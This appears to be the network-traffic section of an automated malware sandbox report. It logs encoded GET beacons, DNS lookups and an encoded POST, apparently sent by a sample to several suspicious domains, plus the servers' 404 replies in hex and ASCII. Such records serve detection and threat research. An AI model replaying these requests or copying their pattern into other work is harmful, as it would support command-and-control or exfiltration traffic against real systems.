                Source: global trafficHTTP traffic detected: GET /2mep/?T2M=Y0Z0G&KxZ=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk/wMyoJJMo2d1H/wS+I5dkctw90/UWWKH7Hql+RyzctUTqPRuvs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.127358.winConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /cnve/?KxZ=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVY2k1UguS5MLScqsLEwQyiaZDJDNhiwSLktxebIPhr8mPgUz4eag=&T2M=Y0Z0G HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.infohive.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /ead0/?KxZ=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBirmmsaQUUC+82V9qNTTK4Z1SvR6iko7BzlkPk6J7u5V/wAfiNkI=&T2M=Y0Z0G HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sunnyz.storeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0G HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.muasamgiare.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /wvsm/?T2M=Y0Z0G&KxZ=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2oBm3vCtx6xeHagKgyNNQL6/tdUVValn9agt9lf/uYkxXHUES57U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sfantulandrei.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /0pqe/?KxZ=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywUHb6Ky4Osqfr3aB0kL6LN4sT6D7TOK7CTnegghrlX225G7BgQJc=&T2M=Y0Z0G HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.mffnow.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficDNS traffic detected: DNS query: www.qqa79.top
                Source: global trafficDNS traffic detected: DNS query: www.gk88top.top
                Source: global trafficDNS traffic detected: DNS query: www.127358.win
                Source: global trafficDNS traffic detected: DNS query: www.infohive.website
                Source: global trafficDNS traffic detected: DNS query: www.sunnyz.store
                Source: global trafficDNS traffic detected: DNS query: www.muasamgiare.click
                Source: global trafficDNS traffic detected: DNS query: www.sfantulandrei.info
                Source: global trafficDNS traffic detected: DNS query: www.mffnow.info
                Source: global trafficDNS traffic detected: DNS query: www.3kw40881107247y.click
                Source: unknownHTTP traffic detected: POST /vjnn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.gk88top.topContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 208Cache-Control: no-cacheOrigin: http://www.gk88top.topReferer: http://www.gk88top.top/vjnn/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)Data Raw: 4b 78 5a 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 6f 38 44 48 43 4a 72 4e 65 76 67 36 65 35 66 45 7a 6d 62 6b 46 76 77 6b 37 6a 57 73 67 74 50 4c 70 5a 79 68 68 59 6b 55 62 4d 50 Data Ascii: KxZ=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeuo8DHCJrNevg6e5fEzmbkFvwk7jWsgtPLpZyhhYkUbMP
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 09:05:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 09:05:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfEY4MD7EiNSxpUccanJMTEy9vKgxk8JqK79xGUR5yRb92JEMa44UP1sjKcLUf3e2bMVLBPx4LdwJFOsKgFZ6Fkb3E2RoXOzZ%2BurN0k1tdkibbNboX4W%2FFD3FyxgdhHvDbc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8edb1df2c834439c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 09:06:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 09:06:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 09:06:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 09:06:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 09:06:19 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
